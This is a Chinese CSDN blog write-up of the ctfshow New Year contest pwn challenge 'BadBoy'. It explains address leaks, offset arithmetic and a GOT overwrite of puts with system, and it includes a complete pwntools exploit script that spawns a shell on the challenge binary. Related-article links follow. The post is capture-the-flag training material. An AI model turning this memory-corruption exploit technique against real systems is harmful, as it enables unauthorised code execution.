ctfshow元旦水友赛-badboy

最新推荐文章于 2024-10-03 09:02:12 发布
最新推荐文章于 2024-10-03 09:02:12 发布
阅读量431 收藏 6
点赞数 10
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/136286584
版权
ctfshow元旦水友赛-badboy

好久没打了,有人提到了,就看一看。

开了canary和nx保护,原本想着泄露canary,结果找不到泄露的方向。

kl点进去可以看到是6
在这里插入图片描述

可以循环两次,第一次泄露6个字节,第二次泄露3个字节。第一次泄露libc,第二次泄露栈。
在这里插入图片描述

地址分别相差0x18(24)和0x38(56),fd8-eb0=0x128(296)

libc.sym查询不到__libc_start_call_main这个名字,直接手动查找相减找了偏移为0x1110+0x26000

(至于为什么又加了一个,因为手动vmmap看libc载入地址的时候看错地方了,第一个才是载入地址,这里看成了第二个,所以多减了一次。)

6个字节足够泄露一个完整的地址,而三个字节不可以,由于需要将buf地址改为put_got的地址,所以一定要知道栈的地址,而3个字节已经足够libc的偏移地址。

另:如果用远程打可以试着泄露下面的__libc_start_main,本地打通了,懒得再去打远程了。~~ 而且题目给了libc文件,从里面去看也一样嘛~~

exp:

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
p=process('./BadBoy-2')
elf=ELF('./BadBoy-2')
libc=elf.libc
#p=remote('',)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()

def debug():
    gdb.attach(p)
    pause(1)
puts_got = 0x601018
#debug()

sl(b'56')
stack_addr = u64(ru('\x7f')[-6:].ljust(8,b'\x00'))-0x128
print(hex(stack_addr))

sl(b'24')
rl()
#print(rl())
libc_addr=u64(rc(3).ljust(8,b'\x00'))
print(hex(libc_addr))
libc_addr = libc_addr-122-0x1110-0x26000
print(hex(libc_addr))
system_addr = libc_addr+libc.sym['system']
print(hex(system_addr))

offset=puts_got-stack_addr
ru('girl')

sd('sh\x00')
ru('me?')
debug()
sl(str(offset))

sd(p32(system_addr))
p.interactive()
~
XYYR-c
关注
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1256
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作小编用的都是自己的kali环境。
【Web】CTFSHOW元旦水友赛部分wp_ctfshow元旦水友赛wp
2401_84281629的博客
04-27 862
这里主要是 ,file://协议支持以file://localhost/etc/hosts的方式访问服务器文件,来绕过开头必须是字母的限制。
[ctf.show 元旦水友杯 2024] pwn复现
weixin_52640415的博客
01-16 1261
rtld_global link_map setcontext+3d orw
【pwn】ctfshow元旦水友赛--BadBoy
question55的博客
02-06 1667
首先先来看一下程序的保护情况这里got表可改,没有开地址随机接着看一下ida逻辑很直接,只有一个main函数,一点点分析这段代码buf[1] = __readfsqword(0x28u); init_func(argc, argv, envp); buf[0] = 'gfedcba'; v5 = 0LL; while ( (_DWORD)kl ) { puts("i am bad boy "); __isoc99_scanf("%ld", &v4); write(
badboy使用手册
Pitbull2014的博客
12-14 465
使用badboy录制脚本 3.1: 页面功能分析: 1.界面视图,模拟浏览器,能够进行操作 2.需要录制脚本的URL 3.点击运行URL 4.Summary:运行的各指标,响应时间,成功事物等 5.参数:在录制到的需要参数化的地方能够在这里操作之后导入jmeter 6.目录树,记录录制到的每一个操作 7.录制按钮,点击之后记录操作...
GDB 调试--新手笔记1
weixin_44442852的博客
10-04 2444
GCC -g 原因 gcc test.cpp -o test -g 调试选项,因此在一般需要进行程序调试的场景下,我们都会加上该选项,并且根据调试工具的不同,还能直接选择更有针对性的说明。 加上-g选项以后,gcc在编译是会做以下额外的操作: 创建符号表,符号表包含了程序使用的变量名称的列表。 关闭所有的优化机制,以便程序执行过程严格按照原来的C代码进行。 如果编译时,没有加...
CTFshow元旦水友赛-web-easy include
jwkaaaaaa的博客
05-22 511
CTF元旦水友赛-web-easy include wp
【Web】CTFSHOW元旦水友赛部分wp
uuzeray的博客
01-02 4102
web一共5题,我出了3题,巧的是好像师傅们也只出了3题,跨年拿旗还是很快乐的,下面直接贴出自己的wp.
【Web】CTFSHOW元旦水友赛部分wp_ctfshow元旦水友赛wp(1)
2401_84281601的博客
04-27 968
content′ctfshowshowshowwww′chu0参数需要传system,按照下面的脚本运行后得到c=003=00l=00z=00d=00G=00V=00t=00现在来构造序列化链首先__wakeup()方法有一个throw new Exception(“fastfast”);,回强制GC回收导致__destruct魔术方法不起作用从而触发不了其他魔术方法,使用数组绕过。详解见的ctfshow 第三届愚人杯 easy_php。
2024元旦倒计时代码-html + css + js
01-10
这个项目是一个纯前端的应用,它能够动态显示距离2024年元旦剩余的天数、小时数、分钟数和秒数。通过简单的定制,这个倒计时器可以适应任何一年的使用需求。 首先,我们需要创建一个基本的HTML结构来展示倒计时。...
元旦倒计时代码-2022年超好看的元旦倒计时
12-11
"元旦倒计时代码-2022年超好看的元旦倒计时"这个标题表明,我们讨论的是一个与2022年元旦相关的编程代码,它的主要功能是显示倒计时,而且设计得非常美观。元旦倒计时通常用于网站或应用程序上,为用户提供节日即将...
元旦倒计时代码-具体展示效果
09-06
元旦倒计时代码-具体展示效果
ctfshow元旦水友赛wp
04-13
很抱歉,我无法提供关于ctfshow元旦水友赛wp的具体介绍,因为我无法获取实时的比赛信息。但是,我可以告诉你一些关于CTF比赛的基本知识和常见的解题思路。 CTF(Capture The Flag)比赛是一种网络安全竞赛,旨在...
(笔记)第三期书生·浦语大模型实战营(十一卷王场)--书生入门岛通关第2关Python 基础知识
haidizym的博客
10-02 448
学员闯关手册:https://aicarrier.feishu.cn/wiki/ZcgkwqteZi9s4ZkYr0Gcayg1n1g?课程视频:https://www.bilibili.com/video/BV1mS421X7h4/课程文档:https://github.com/InternLM/Tutorial/tree/camp3/docs/L0/Python
遥感影像-实例分割数据集:iSAID 从切图到YOLO格式数据集制作详细介绍
GIS潮流
09-30 1123
开源数据集isaid标注包含实例分割,但是原始影像太大,很吃显存,一般显卡无法用原始影像直接训练,所以需要对影像进行裁剪,并生成对应的标签,因为想用yolo系列跑模型,所以将标签需要转为txt格式。
酷炫音乐盒: 使用Python和Tkinter配合Pygame打造自己的音乐播放器
宇宙第一小趴菜的博客
09-29 1212
Tkinter是一个功能强大且简单易用的库,适合构建轻量级的GUI应用程序。它在不同的操作系统上具有相同的外观和行为,因此可以实现跨平台的应用程序。当然,Tkinter还有更多的功能和细节,通过阅读官方文档和教程,你可以更深入地了解和学习如何运用Tkinter来创建各种GUI应用程序。
Python | Leetcode Python题解之第448题找到所有数组消失的数字
Mopes__的博客
10-01 389
Python | Leetcode Python题解之第448题找到所有数组消失的数字
Python编写的贪吃蛇小游戏
最新发布
WwLK123的博客
10-03 352
Python编写贪吃蛇小游戏。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值